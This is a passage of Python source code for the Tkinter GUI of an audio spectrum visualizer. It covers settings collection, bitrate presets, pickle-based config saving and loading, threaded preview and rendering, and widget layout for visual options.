checkFloat(tk_bright),\n \"saturation\": checkFloat(tk_saturation),\n\n \"blur_bg\": bg_mode_dic[checkStr(tk_bg_mode)][0],\n \"bg_mode\": bg_mode_dic[checkStr(tk_bg_mode)][1],\n \"use_glow\": tk_use_glow.get(),\n \"relsize\": checkFloat(tk_relsize),\n\n \"width\": checkInt(tk_width),\n \"height\": checkInt(tk_height),\n \"fps\": checkFloat(tk_fps),\n \"br_Mbps\": checkFloat(tk_br_video),\n\n \"normal\": tk_audio_normal.get(),\n \"br_kbps\": checkInt(tk_br_audio),\n\n \"style\": style_dic[checkStr(tk_style)],\n \"linewidth\": checkFloat(tk_linewidth),\n \"rotate\": checkFloat(tk_rotate),\n\n }\n return param_dict\n\n\ndef dict2tuple(dict_input):\n keys = []\n for key in dict_input.keys():\n keys.append(key)\n return tuple(keys)\n\n\ndef autoBitrate():\n vdic = getAllValues()\n global tk_br_video\n if vdic[\"width\"] is not None and vdic[\"height\"] is not None and vdic[\"fps\"] is not None:\n brv = getDefaultBR(vdic[\"width\"], vdic[\"height\"], vdic[\"fps\"], 4)\n tk_br_video.set(round(brv * 100) / 100)\n\n\ndef setBlender(param_dict):\n global fb\n fb.setConsole(InfoBridge())\n fb.setFilePath(image_path=param_dict[\"image_path\"],\n bg_path=param_dict[\"bg_path\"],\n sound_path=param_dict[\"sound_path\"],\n logo_path=param_dict[\"logo_path\"])\n fb.setOutputPath(output_path=param_dict[\"output_path\"],\n filename=param_dict[\"filename\"])\n fb.setText(text=param_dict[\"text\"], font=param_dict[\"font\"],\n relsize=param_dict[\"relsize\"], text_brt=param_dict[\"text_brt\"])\n fb.setSpec(bins=param_dict[\"bins\"], lower=param_dict[\"lower\"], upper=param_dict[\"upper\"],\n color=param_dict[\"color\"], bright=param_dict[\"bright\"], saturation=param_dict[\"saturation\"],\n scalar=param_dict[\"scalar\"], smooth=param_dict[\"smooth\"],\n style=param_dict[\"style\"], linewidth=param_dict[\"linewidth\"])\n fb.setVideoInfo(width=param_dict[\"width\"], height=param_dict[\"height\"],\n fps=param_dict[\"fps\"], br_Mbps=param_dict[\"br_Mbps\"],\n blur_bg=param_dict[\"blur_bg\"], use_glow=param_dict[\"use_glow\"],\n bg_mode=param_dict[\"bg_mode\"], rotate=param_dict[\"rotate\"])\n fb.setAudioInfo(normal=param_dict[\"normal\"], br_kbps=param_dict[\"br_kbps\"])\n\n\ndef getDefaultBR(width, height, fps, quality=3):\n if quality == 5:\n return 20 * (width * height * fps) / (1920 * 1080 * 30)\n elif quality == 4:\n return 12 * (width * height * fps) / (1920 * 1080 * 30)\n elif quality == 3:\n return 7 * (width * height * fps) / (1920 * 1080 * 30)\n elif quality == 2:\n return 2 * (width * height * fps) / (1920 * 1080 * 30)\n elif quality == 1:\n return (width * height * fps) / (1920 * 1080 * 30)\n elif quality == 0:\n return 0.5 * (width * height * fps) / (1920 * 1080 * 30)\n else:\n return 12 * (width * height * fps) / (1920 * 1080 * 30)\n\n\ndef showPreview():\n global fb\n if not isRunning:\n saveConfig()\n setBlender(getAllValues())\n\n def _showPreview():\n global frame2, root_view\n frame2.imshow(fb.previewBackground())\n if not frame2.winfo_viewable():\n root_view.deiconify()\n\n th_preview = threading.Thread(target=_showPreview)\n th_preview.setDaemon(True)\n th_preview.start()\n else:\n global root_view\n if not root_view.winfo_viewable():\n root_view.deiconify()\n\n\ndef startBlending():\n global fb\n vdic = getAllValues()\n if vdic[\"sound_path\"] is None:\n tkinter.messagebox.showinfo(lang[\"Cannot Blend\"], lang[\"Please select the correct audio file!\"])\n return\n if vdic[\"output_path\"] is None:\n tkinter.messagebox.showinfo(lang[\"Cannot Blend\"], lang[\"Please select the correct output path!\"])\n return\n if vdic[\"filename\"] is None:\n tkinter.messagebox.showinfo(lang[\"Cannot Blend\"], lang[\"Please input the corrent file name!\"])\n return\n\n if not isRunning:\n setBlender(vdic)\n if os.path.exists(fb.getOutputPath()):\n MsgBox = tk.messagebox.askquestion(lang[\"Notice\"], lang[\"Are you sure to overwrite this file?\"])\n if MsgBox == 'yes':\n pass\n else:\n return\n showPreview()\n clearLog()\n saveConfig()\n th_blend = threading.Thread(target=fb.runBlending)\n th_blend.setDaemon(True)\n th_blend.start()\n else:\n MsgBox = tk.messagebox.askquestion(lang[\"Notice\"], lang[\"Are you sure to stop blending?\"])\n if MsgBox == 'yes':\n pass\n else:\n return\n clog(lang[\"Stop Blending...\"] + \"\\n\")\n fb.isRunning = False\n\n\ndef presetVideo(*args):\n global video_dic, list_presetv, tk_width, tk_height, tk_fps, tk_br_video\n w, h, fps, brv = video_dic[list_presetv.get()]\n tk_width.set(w)\n tk_height.set(h)\n tk_fps.set(fps)\n tk_br_video.set(round(brv * 100) / 100)\n fastPreview()\n\n\ndef presetAudio(*args):\n global audio_dic, tk_br_audio, tk_fq_low, tk_fq_high, tk_audio_normal, tk_scalar, tk_smooth\n bra, low, up, normal, scale, smooth = audio_dic[list_preseta.get()]\n tk_br_audio.set(bra)\n tk_fq_low.set(low)\n tk_fq_high.set(up)\n tk_audio_normal.set(normal)\n tk_scalar.set(scale)\n tk_smooth.set(smooth)\n\n\ndef saveConfig():\n vdic = getAllValues()\n try:\n directory = os.path.dirname(\"./Source/\")\n if not os.path.exists(directory):\n os.makedirs(directory)\n with open('./Source/config.pickle', 'wb') as handle:\n pickle.dump(vdic, handle, protocol=pickle.HIGHEST_PROTOCOL)\n except:\n clog(lang[\"Error! Cannot save config!\"])\n\n\ndef loadConfig():\n try:\n with open('./Source/config.pickle', 'rb') as handle:\n vdic = pickle.load(handle)\n except:\n print(\"No config\")\n saveConfig()\n return\n\n global tk_image_path, tk_sound_path, tk_logo_path, tk_output_path, tk_filename, \\\n tk_text, tk_font, tk_bins, tk_fq_low, tk_fq_high, color_dic, list_color, tk_scalar, \\\n tk_width, tk_height, tk_fps, tk_br_video, tk_br_audio, tk_audio_normal, tk_smooth, \\\n tk_bg_path, tk_bright, tk_blur_bg, tk_use_glow, tk_relsize, tk_bg_mode, label_mp4, \\\n style_dic, tk_saturation, tk_text_brt\n\n def fileCheck(dicv, tk_value):\n try:\n path = vdic[dicv]\n if path is not None and os.path.exists(path):\n tk_value.set(path)\n else:\n tk_value.set(\"\")\n except:\n pass\n\n def strCheck(dicv, tk_value, trunc=False):\n try:\n strv = vdic[dicv]\n if strv is not None:\n if not trunc:\n tk_value.set(strv)\n else:\n tk_value.set(\"\".join(strv.split(\".\")[:-1]))\n else:\n tk_value.set(\"\")\n except:\n pass\n\n def numCheck(dicv, tk_value):\n try:\n num = vdic[dicv]\n if num is not None:\n tk_value.set(num)\n else:\n tk_value.set(0)\n except:\n pass\n\n fileCheck(\"image_path\", tk_image_path)\n fileCheck(\"sound_path\", tk_sound_path)\n fileCheck(\"bg_path\", tk_bg_path)\n fileCheck(\"logo_path\", tk_logo_path)\n fileCheck(\"output_path\", tk_output_path)\n strCheck(\"filename\", tk_filename, True)\n strCheck(\"text\", tk_text)\n fileCheck(\"font\", tk_font)\n numCheck(\"bins\", tk_bins)\n numCheck(\"lower\", tk_fq_low)\n numCheck(\"upper\", tk_fq_high)\n numCheck(\"scalar\", tk_scalar)\n numCheck(\"width\", tk_width)\n numCheck(\"height\", tk_height)\n numCheck(\"fps\", tk_fps)\n numCheck(\"br_Mbps\", tk_br_video)\n numCheck(\"br_kbps\", tk_br_audio)\n numCheck(\"normal\", tk_audio_normal)\n numCheck(\"bright\", tk_bright)\n numCheck(\"saturation\", tk_saturation)\n numCheck(\"blur_bg\", tk_blur_bg)\n numCheck(\"use_glow\", tk_use_glow)\n numCheck(\"smooth\", tk_smooth)\n numCheck(\"relsize\", tk_relsize)\n numCheck(\"text_brt\", tk_text_brt)\n numCheck(\"linewidth\", tk_linewidth)\n numCheck(\"rotate\", tk_rotate)\n\n try:\n if vdic[\"color\"] is not None:\n color_prev = None\n for cname, ccode in color_dic.items():\n if ccode == vdic[\"color\"]:\n color_prev = cname\n break\n if color_prev is not None:\n tk_color.set(color_prev)\n except:\n pass\n\n try:\n if vdic[\"blur_bg\"] is not None and vdic[\"bg_mode\"] is not None:\n if vdic[\"bg_mode\"] >= 0:\n label_mp4[\"text\"] = \".mp4\"\n else:\n label_mp4[\"text\"] = \".mov\"\n for bname, values in bg_mode_dic.items():\n if values == [vdic[\"blur_bg\"], vdic[\"bg_mode\"]]:\n tk_bg_mode.set(bname)\n except:\n pass\n\n try:\n if vdic[\"style\"] is not None:\n for sname, scode in style_dic.items():\n if scode == vdic[\"style\"]:\n tk_style.set(sname)\n break\n except:\n pass\n\n entry_img.xview(\"end\")\n entry_logo.xview(\"end\")\n entry_bg.xview(\"end\")\n entry_fname.xview(\"end\")\n entry_audio.xview(\"end\")\n entry_output.xview(\"end\")\n entry_font.xview(\"end\")\n\n\ndef saveLanguage():\n global lang, lang_code\n with open('./Source/language.pickle', 'wb') as handle:\n pickle.dump(lang_code, handle, protocol=pickle.HIGHEST_PROTOCOL)\n\n\ndef loadLanguage():\n global lang, lang_code\n lang_code = \"en\"\n try:\n with open('./Source/language.pickle', 'rb') as handle:\n lang_code = pickle.load(handle)\n except:\n print(\"No language config\")\n\n if lang_code == \"cn_s\":\n lang = lang_cn_s\n else:\n lang = lang_en\n\n\ndef resetGUI(*args):\n global lang_code, exit_flag, root, list_lang\n # lang_code = lc\n if list_lang.get() == \"简体中文\":\n lang_code = \"cn_s\"\n else:\n lang_code = \"en\"\n saveConfig()\n saveLanguage()\n exit_flag = False\n root.destroy()\n\n\ndef setFileType(*args):\n global label_mp4, bg_mode_dic, tk_bg_mode\n try:\n if bg_mode_dic[tk_bg_mode.get()][1] >= 0:\n label_mp4[\"text\"] = \".mp4\"\n else:\n label_mp4[\"text\"] = \".mov\"\n except:\n pass\n\n\ndef fastPreview(*args):\n global frame2, old_vdic\n if frame2 and frame2.winfo_viewable():\n vdic = getAllValues()\n if vdic != old_vdic:\n showPreview()\n\n\ndef shortCut(event):\n if event.keysym == \"F5\":\n startBlending()\n if event.keysym == \"F4\":\n showPreview()\n\n\ndef bindPreview(tk_obj):\n tk_obj.trace(\"w\", lambda name, index, mode=tk_obj: fastPreview())\n\n\nif __name__ == '__main__':\n exit_flag = False\n GUI_WIDTH = 950\n GUI_HEIGHT = 700\n while not exit_flag:\n exit_flag = True\n\n root = tk.Tk()\n loadLanguage()\n\n old_vdic = None\n tk_image_path = tk.StringVar(value=\"./Source/fallback.png\")\n tk_sound_path = tk.StringVar()\n tk_logo_path = tk.StringVar(value=\"./Source/Logo.png\")\n tk_bg_path = tk.StringVar(value=\"\")\n tk_output_path = tk.StringVar()\n tk_filename = tk.StringVar(value=\"output\")\n\n tk_text = tk.StringVar()\n tk_font = tk.StringVar(value=\"./Source/font.otf\")\n tk_relsize = tk.DoubleVar(value=1.0)\n bindPreview(tk_relsize)\n tk_text_brt = tk.DoubleVar(value=1.0)\n bindPreview(tk_text_brt)\n\n tk_bins = tk.IntVar(value=80)\n bindPreview(tk_bins)\n\n tk_fq_low = tk.IntVar()\n tk_fq_high = tk.IntVar()\n tk_scalar = tk.DoubleVar()\n tk_color = tk.StringVar()\n bindPreview(tk_color)\n tk_bright = tk.DoubleVar(value=0.8)\n bindPreview(tk_bright)\n tk_saturation = tk.DoubleVar(value=0.8)\n bindPreview(tk_saturation)\n tk_smooth = tk.IntVar()\n tk_linewidth = tk.DoubleVar(value=1.0)\n bindPreview(tk_linewidth)\n tk_style = tk.StringVar()\n bindPreview(tk_style)\n\n tk_bg_mode = tk.StringVar()\n bindPreview(tk_bg_mode)\n tk_blur_bg = tk.BooleanVar(value=True)\n bindPreview(tk_blur_bg)\n tk_use_glow = tk.BooleanVar(value=False)\n bindPreview(tk_use_glow)\n tk_rotate = tk.DoubleVar(value=0)\n\n tk_width = tk.IntVar()\n tk_height = tk.IntVar()\n tk_fps = tk.DoubleVar()\n tk_br_video = tk.DoubleVar()\n tk_br_audio = tk.IntVar()\n tk_audio_normal = tk.BooleanVar()\n\n tk_preseta = tk.StringVar()\n tk_presetv = tk.StringVar()\n\n tk_lang = tk.StringVar()\n\n isRunning = False\n\n fb = FanBlender()\n\n root.title(lang[\"Fanseline Audio Visualizer\"] + \" -V.\" + __version__)\n root.bind('', shortCut)\n canvas = tk.Canvas(root, width=GUI_WIDTH, height=GUI_HEIGHT)\n canvas.pack()\n frame1 = tk.Frame(master=root)\n frame1.place(relx=0, rely=0, relwidth=1, relheight=1, anchor='nw')\n\n root_view = tk.Toplevel(root)\n root_view.title(lang[\"Preview\"])\n root_view.withdraw()\n canvas = tk.Canvas(root_view, width=GUI_WIDTH // 2, height=GUI_HEIGHT // 2)\n canvas.pack()\n frame2 = ImageViewer(root_view)\n frame2.setGUI(GUI_WIDTH * 2 / 3, GUI_HEIGHT)\n frame2.setLanguage(lang)\n\n rely, devy = 0.01, 0.06\n relh = 0.04\n\n label_lang = tk.Label(master=frame1, textvariable=tk.StringVar(value=\"Language/语言:\"), anchor=\"e\")\n label_lang.place(relwidth=0.1, relheight=relh, relx=0.05, rely=rely, anchor='nw')\n list_lang = ttk.Combobox(master=frame1, textvariable=tk_lang, state=\"readonly\")\n list_lang[\"values\"] = (\"English\", \"简体中文\")\n if lang_code == \"cn_s\":\n list_lang.current(1)\n else:\n list_lang.current(0)\n list_lang.place(relwidth=0.1, relheight=relh, relx=0.15, rely=rely, anchor='nw')\n list_lang.bind(\"<>\", resetGUI)\n\n label_preseta = tk.Label(master=frame1, textvariable=tk.StringVar(value=lang[\"Audio Preset:\"]), anchor=\"e\")\n label_preseta.place(relwidth=0.1, relheight=relh, relx=0.25, rely=rely, anchor='nw')\n list_preseta = ttk.Combobox(master=frame1, textvariable=tk_preseta, state=\"readonly\")\n audio_dic = {\n lang[\"Music-HQ\"] + \" (320k)\": [320, 20, 2500, False, 1.0, 2],\n lang[\"Music-MQ\"] + \" (128k)\": [128, 20, 2500, False, 1.0, 2],\n lang[\"Music-LQ\"] + \" (48k)\": [48, 20, 2500, False, 1.0, 2],\n lang[\"Voice-HQ\"] + \" (320k)\": [320, 20, 2500, True, 1.0, 5],\n lang[\"Voice-MQ\"] + \" (128k)\": [128, 40, 2200, True, 1.0, 5],\n lang[\"Voice-LQ\"] + \" (48k)\": [48, 80, 2000, True, 1.0, 5],\n }\n list_preseta[\"values\"] = dict2tuple(audio_dic)\n list_preseta.current(0)\n list_preseta.bind(\"<>\", presetAudio)\n presetAudio()\n list_preseta.set(lang[\"-Please Select-\"])\n list_preseta.place(relwidth=0.14, relheight=relh, relx=0.35, rely=rely, anchor='nw')\n\n label_presetv = tk.Label(master=frame1, textvariable=tk.StringVar(value=lang[\"Video Preset:\"]), anchor=\"e\")\n label_presetv.place(relwidth=0.1, relheight=relh, relx=0.5, rely=rely, anchor='nw')\n list_presetv = ttk.Combobox(master=frame1, textvariable=tk_presetv, state=\"readonly\")\n video_dic = {\n lang[\"Square\"] + \" (1080x1080)\": [1080, 1080, 30, getDefaultBR(1080, 1080, 30, 5)],\n lang[\"Square\"] + \" (1024x1024)\": [1024, 1024, 30, getDefaultBR(1024, 1024, 30, 5)],\n lang[\"Square\"] + \" (720x720)\": [720, 720, 30, getDefaultBR(720, 720, 30, 4)],\n lang[\"Square\"] + \" (512x512)\": [512, 512, 30, getDefaultBR(512, 512, 30, 4)],\n lang[\"Square\"] + \" (480x480)\": [480, 480, 30, getDefaultBR(480, 480, 30, 4)],\n lang[\"Landscape\"] + \" (1920x1080)\": [1920, 1080, 30, getDefaultBR(1920, 1080, 30, 5)],\n lang[\"Landscape\"] + \" (1280x720)\": [1280, 720, 30, getDefaultBR(1280, 720, 30, 4)],\n lang[\"Landscape\"] + \" (854x480)\": [854, 480, 30, getDefaultBR(854, 480, 30, 4)],\n lang[\"Portrait\"] + \" (1080x1920)\": [1080, 1920, 30, getDefaultBR(1920, 1080, 30, 5)],\n lang[\"Portrait\"] + \" (720x1280)\": [720, 1280, 30, getDefaultBR(1280, 720, 30, 4)],\n lang[\"Portrait\"] + \" (480x854)\": [480, 854, 30, getDefaultBR(854, 480, 30, 4)],\n \"2k (2560x1440)\": [2560, 1440, 30, getDefaultBR(2560, 1440, 30, 5)],\n }\n list_presetv[\"values\"] = dict2tuple(video_dic)\n list_presetv.current(4)\n list_presetv.bind(\"<>\", presetVideo)\n presetVideo()\n list_presetv.set(lang[\"-Please Select-\"])\n list_presetv.place(relwidth=0.19, relheight=relh, relx=0.6, rely=rely, anchor='nw')\n\n btn_prev = tk.Button(master=frame1, text=lang[\"Preview\"], command=showPreview)\n btn_prev.place(relwidth=0.15, relheight=relh, relx=0.8, rely=rely, anchor='nw')\n\n rely += devy\n entry_audio = tk.Entry(master=frame1, textvariable=tk_sound_path)\n entry_audio.place(relwidth=0.74, relheight=relh, relx=0.05, rely=rely, anchor='nw')\n btn_audio = tk.Button(master=frame1, text=lang[\"Audio (REQUIRED)\"], command=selectAudio)\n btn_audio.place(relwidth=0.15, relheight=relh, relx=0.8, rely=rely, anchor='nw')\n\n rely += devy\n entry_img = tk.Entry(master=frame1, textvariable=tk_image_path)\n entry_img.place(relwidth=0.74, relheight=relh, relx=0.05, rely=rely, anchor='nw')\n btn_img = tk.Button(master=frame1, text=lang[\"Foreground Image\"], command=selectImage)\n btn_img.place(relwidth=0.15, relheight=relh, relx=0.8, rely=rely, anchor='nw')\n\n rely += devy\n entry_bg = tk.Entry(master=frame1, textvariable=tk_bg_path)\n entry_bg.place(relwidth=0.28, relheight=relh, relx=0.05, rely=rely, anchor='nw')\n btn_bg = tk.Button(master=frame1, text=lang[\"Background Image\"], command=selectBG)\n btn_bg.place(relwidth=0.15, relheight=relh, relx=0.34, rely=rely, anchor='nw')\n\n entry_logo = tk.Entry(master=frame1, textvariable=tk_logo_path)\n entry_logo.place(relwidth=0.29, relheight=relh, relx=0.5, rely=rely, anchor='nw')\n btn_logo = tk.Button(master=frame1, text=lang[\"Logo File\"], command=selectLogo)\n btn_logo.place(relwidth=0.15, relheight=relh, relx=0.8, rely=rely, anchor='nw')\n\n rely += devy\n label_textplz = tk.Label(master=frame1, textvariable=tk.StringVar(value=lang[\"Your Text:\"]), anchor=\"e\")\n label_textplz.place(relwidth=0.1, relheight=relh, relx=0.05, rely=rely, anchor='nw')\n entry_text = tk.Entry(master=frame1, textvariable=tk_text)\n entry_text.place(relwidth=0.18, relheight=relh, relx=0.15, rely=rely, anchor='nw')\n entry_text.bind(\"\", fastPreview)\n entry_text.bind('', fastPreview)\n tk_text.set(\"Hello World!\")\n\n label_text_brt = tk.Label(master=frame1, textvariable=tk.StringVar(value=lang[\"Text Brt.:\"]), anchor=\"e\")\n label_text_brt.place(relwidth=0.1, relheight=relh, relx=0.35, rely=rely, anchor='nw')\n entry_text_brt = ttk.Combobox(master=frame1, textvariable=tk_text_brt)\n entry_text_brt[\"values\"] = (1.0, 0.9, 0.8, 0.7, 0.6, 0.5, 0.4, 0.3, 0.2, 0.1, 0.0)\n entry_text_brt.current(0)\n entry_text_brt.place(relwidth=0.05, relheight=relh, relx=0.45, rely=rely, anchor='nw')\n\n label_font = tk.Label(master=frame1, textvariable=tk.StringVar(value=lang[\"Font Size:\"]), anchor=\"e\")\n label_font.place(relwidth=0.08, relheight=relh, relx=0.51, rely=rely, anchor='nw')\n\n entry_relsize = ttk.Combobox(master=frame1, textvariable=tk_relsize)\n entry_relsize[\"values\"] = (3.0, 2.8, 2.5, 2.2, 2.0, 1.8, 1.5, 1.2, 1.0, 0.8, 0.5)\n entry_relsize.current(8)\n entry_relsize.place(relwidth=0.05, relheight=relh, relx=0.59, rely=rely, anchor='nw')\n\n entry_font = tk.Entry(master=frame1, textvariable=tk_font)\n entry_font.place(relwidth=0.14, relheight=relh, relx=0.65, rely=rely, anchor='nw')\n btn_font = tk.Button(master=frame1, text=lang[\"Font File\"], command=selectFont)\n btn_font.place(relwidth=0.15, relheight=relh, relx=0.8, rely=rely, anchor='nw')\n\n rely += devy\n label_size = tk.Label(master=frame1, textvariable=tk.StringVar(value=lang[\"Video Size:\"]), anchor=\"e\")\n label_size.place(relwidth=0.1, relheight=relh, relx=0.05, rely=rely, anchor='nw')\n entry_width = tk.Entry(master=frame1, textvariable=tk_width)\n entry_width.place(relwidth=0.05, relheight=relh, relx=0.15, rely=rely, anchor='nw')\n entry_width.bind(\"\", fastPreview)\n entry_width.bind('', fastPreview)\n\n label_mul = tk.Label(master=frame1, textvariable=tk.StringVar(value=\"x\"))\n label_mul.place(relwidth=0.03, relheight=relh, relx=0.2, rely=rely, anchor='nw')\n\n entry_height = tk.Entry(master=frame1, textvariable=tk_height)\n entry_height.place(relwidth=0.05, relheight=relh, relx=0.23, rely=rely, anchor='nw')\n entry_height.bind(\"\", fastPreview)\n entry_height.bind('', fastPreview)\n\n label_fps = tk.Label(master=frame1, textvariable=tk.StringVar(value=lang[\"FPS:\"]), anchor=\"e\")\n label_fps.place(relwidth=0.1, relheight=relh, relx=0.35, rely=rely, anchor='nw')\n entry_fps = ttk.Combobox(master=frame1, textvariable=tk_fps)\n entry_fps[\"values\"] = (60.0, 50.0, 30.0, 25.0, 20.0, 15.0)\n entry_fps.current(2)\n entry_fps.place(relwidth=0.05, relheight=relh, relx=0.45, rely=rely, anchor='nw')\n\n label_brv = tk.Label(master=frame1, textvariable=tk.StringVar(value=lang[\"Video BR (Mbps):\"]), anchor=\"e\")\n label_brv.place(relwidth=0.12, relheight=relh, relx=0.53, rely=rely, anchor='nw')\n entry_brv = tk.Entry(master=frame1, textvariable=tk_br_video)\n entry_brv.place(relwidth=0.05, relheight=relh, relx=0.65, rely=rely, anchor='nw')\n\n btn_autob = tk.Button(master=frame1, text=lang[\"Auto Bit Rate\"], command=autoBitrate)\n btn_autob.place(relwidth=0.15, relheight=relh, relx=0.8, rely=rely, anchor='nw')\n\n rely += devy\n label_bra = tk.Label(master=frame1, textvariable=tk.StringVar(value=lang[\"Audio BR:\"]), anchor=\"e\")\n label_bra.place(relwidth=0.1, relheight=relh, relx=0.05, rely=rely, anchor='nw')\n list_bra = ttk.Combobox(master=frame1, textvariable=tk_br_audio)\n list_bra[\"values\"] = (320, 256, 192, 128, 96, 64, 48)\n list_bra.current(0)\n list_bra.place(relwidth=0.08, relheight=relh, relx=0.15, rely=rely, anchor='nw')\n label_kbps = tk.Label(master=frame1, textvariable=tk.StringVar(value=\"Kbps\"), anchor=\"w\")\n label_kbps.place(relwidth=0.05, relheight=relh, relx=0.23, rely=rely, anchor='nw')\n\n check_normal = tk.Checkbutton(master=frame1, text=lang[\"Normalize Volume\"],\n variable=tk_audio_normal, onvalue=True, offvalue=False, anchor=\"e\")\n check_normal.place(relwidth=0.15, relheight=relh, relx=0.3, rely=rely, anchor='nw')\n\n label_bg_mode = tk.Label(master=frame1, textvariable=tk.StringVar(value=lang[\"BG Mode:\"]), anchor=\"e\")\n label_bg_mode.place(relwidth=0.1, relheight=relh, relx=0.7, rely=rely, anchor='nw')\n list_bg_mode = ttk.Combobox(master=frame1, textvariable=tk_bg_mode, state=\"readonly\")\n bg_mode_dic = {\n lang[\"Blurred BG Image\"]: [True, 0],\n lang[\"Normal BG Image\"]: [False, 0],\n lang[\"Blurred BG Only\"]: [True, 2],\n lang[\"Normal BG Only\"]: [False, 2],\n lang[\"Transparent\"]: [False, -1],\n lang[\"Spectrum Only\"]: [False, -2],\n }\n\n list_bg_mode[\"values\"] = dict2tuple(bg_mode_dic)\n list_bg_mode.current(0)\n list_bg_mode.bind(\"<>\", setFileType)\n list_bg_mode.place(relwidth=0.15, relheight=relh, relx=0.8, rely=rely, anchor='nw')\n\n rely += devy\n label_range = tk.Label(master=frame1, textvariable=tk.StringVar(value=lang[\"Analyze Freq:\"]), anchor=\"e\")\n label_range.place(relwidth=0.1, relheight=relh, relx=0.05, rely=rely, anchor='nw')\n entry_low = tk.Entry(master=frame1, textvariable=tk_fq_low)\n entry_low.place(relwidth=0.05, relheight=relh, relx=0.15, rely=rely, anchor='nw')\n label_to = tk.Label(master=frame1, textvariable=tk.StringVar(value=lang[\"to\"]))\n label_to.place(relwidth=0.03, relheight=relh, relx=0.2, rely=rely, anchor='nw')\n entry_up = tk.Entry(master=frame1, textvariable=tk_fq_high)\n entry_up.place(relwidth=0.05, relheight=relh, relx=0.23, rely=rely, anchor='nw')\n label_hz = tk.Label(master=frame1, textvariable=tk.StringVar(value=lang[\"Hz\"]), anchor=\"w\")\n label_hz.place(relwidth=0.03, relheight=relh, relx=0.28, rely=rely, anchor='nw')\n\n label_bins = tk.Label(master=frame1, textvariable=tk.StringVar(value=lang[\"Spectrum Num:\"]), anchor=\"e\")\n label_bins.place(relwidth=0.1, relheight=relh, relx=0.35, rely=rely, anchor='nw')\n entry_bins = ttk.Combobox(master=frame1, textvariable=tk_bins)\n entry_bins[\"values\"] = (6, 12, 18, 24, 36, 48, 60, 72, 84, 96, 108, 120)\n entry_bins.current(5)\n entry_bins.place(relwidth=0.05, relheight=relh, relx=0.45, rely=rely, anchor='nw')\n\n label_scalar = tk.Label(master=frame1, textvariable=tk.StringVar(value=lang[\"Spectrum Scalar:\"]), anchor=\"e\")\n label_scalar.place(relwidth=0.12, relheight=relh, relx=0.53, rely=rely, anchor='nw')\n entry_scalar = ttk.Combobox(master=frame1, textvariable=tk_scalar)\n entry_scalar[\"values\"] = (0.05, 0.1, 0.2, 0.5, 0.7, 1.0, 1.5, 2.0, 2.5, 3.0, 3.5, 4.0, 4.5, 5.0)\n entry_scalar.current(5)\n entry_scalar.place(relwidth=0.05, relheight=relh, relx=0.65, rely=rely, anchor='nw')\n\n label_color = tk.Label(master=frame1, textvariable=tk.StringVar(value=lang[\"Spec. Hue:\"]), anchor=\"e\")\n label_color.place(relwidth=0.1, relheight=relh, relx=0.7, rely=rely, anchor='nw')\n list_color = ttk.Combobox(master=frame1, textvariable=tk_color, state=\"readonly\")\n\n color_dic = {\n lang[\"Rainbow 4x\"]: \"color4x\",\n lang[\"Rainbow 2x\"]: \"color2x\",\n lang[\"Rainbow 1x\"]: \"color1x\",\n lang[\"White\"]: \"white\",\n lang[\"Black\"]: \"black\",\n lang[\"Gray\"]: \"gray\",\n lang[\"Red\"]: \"red\",\n lang[\"Green\"]: \"green\",\n lang[\"Blue\"]: \"blue\",\n lang[\"Yellow\"]: \"yellow\",\n lang[\"Magenta\"]: \"magenta\",\n lang[\"Purple\"]: \"purple\",\n lang[\"Cyan\"]: \"cyan\",\n lang[\"Light Green\"]: \"lightgreen\",\n lang[\"Green - Blue\"]: \"green-blue\",\n lang[\"Magenta - Purple\"]: \"magenta-purple\",\n lang[\"Red - Yellow\"]: \"red-yellow\",\n lang[\"Yellow - Green\"]: \"yellow-green\",\n lang[\"Blue - Purple\"]: \"blue-purple\",\n }\n\n list_color[\"values\"] = dict2tuple(color_dic)\n list_color.current(0)\n list_color.place(relwidth=0.15, relheight=relh, relx=0.8, rely=rely, anchor='nw')\n\n rely += devy\n\n label_style = tk.Label(master=frame1, textvariable=tk.StringVar(value=lang[\"Spectrum Style:\"]), anchor=\"e\")\n label_style.place(relwidth=0.1, relheight=relh, relx=0.05, rely=rely, anchor='nw')\n list_style = ttk.Combobox(master=frame1, textvariable=tk_style)\n\n style_dic = {\n lang[\"Solid Line\"]: 0,\n lang[\"Dot Line\"]: 1,\n lang[\"Single Dot\"]: 2,\n lang[\"Double Dot\"]: 7,\n lang[\"Concentric\"]: 8,\n lang[\"Line Graph\"]: 17,\n lang[\"Classic 1\"]: 9,\n lang[\"Classic 2\"]: 10,\n lang[\"Classic 3\"]: 15,\n lang[\"Classic 4\"]: 16,\n lang[\"Classic Dot 1\"]: 11,\n lang[\"Classic Dot 2\"]: 12,\n lang[\"Classic Dot 3\"]: 13,\n lang[\"Classic Dot 4\"]: 14,\n lang[\"Stem Plot 1\"]: 3,\n lang[\"Stem Plot 2\"]: 4,\n lang[\"Stem Plot 3\"]: 5,\n lang[\"Stem Plot 4\"]: 6,\n lang[\"No Spectrum\"]: -1,\n }\n list_style[\"values\"] = dict2tuple(style_dic)\n list_style[\"state\"] = \"readonly\"\n list_style.current(0)\n list_style.place(relwidth=0.13, relheight=relh, relx=0.15, rely=rely, anchor='nw')\n\n label_linewidth = tk.Label(master=frame1, textvariable=tk.StringVar(value=lang[\"Line Width:\"]), anchor=\"e\")\n label_linewidth.place(relwidth=0.1, relheight=relh, relx=0.35, rely=rely, anchor='nw')\n entry_linewidth = ttk.Combobox(master=frame1, textvariable=tk_linewidth)\n entry_linewidth[\"values\"] = (\n 15.0, 12.0, 10.0, 8.0, 6.0, 5.0, 4.0, 3.0, 2.0, 1.5, 1.2, 1.0, 0.8, 0.6, 0.5, 0.4, 0.3)\n entry_linewidth.current(11)\n entry_linewidth.place(relwidth=0.05, relheight=relh, relx=0.45, rely=rely, anchor='nw')\n\n label_smooth = tk.Label(master=frame1, textvariable=tk.StringVar(value=lang[\"Spectrum Stabilize:\"]), anchor=\"e\")\n label_smooth.place(relwidth=0.15, relheight=relh, relx=0.50, rely=rely, anchor='nw')\n list_smooth = ttk.Combobox(master=frame1, textvariable=tk_smooth)\n list_smooth[\"values\"] = (0, 1, 2, 3, 5, 6, 7, 8, 9, 10)\n list_smooth.current(0)\n list_smooth.place(relwidth=0.05, relheight=relh, relx=0.65, rely=rely, anchor='nw')\n\n label_saturation = tk.Label(master=frame1, textvariable=tk.StringVar(value=lang[\"Spec. Sat.:\"]), anchor=\"e\")\n label_saturation.place(relwidth=0.1, relheight=relh, relx=0.7, rely=rely, anchor='nw')\n entry_saturation = ttk.Combobox(master=frame1, textvariable=tk_saturation)\n entry_saturation[\"values\"] = (1.0, 0.9, 0.8, 0.7, 0.6, 0.5, 0.4, 0.3, 0.2, 0.1, 0.0)\n entry_saturation.current(4)\n 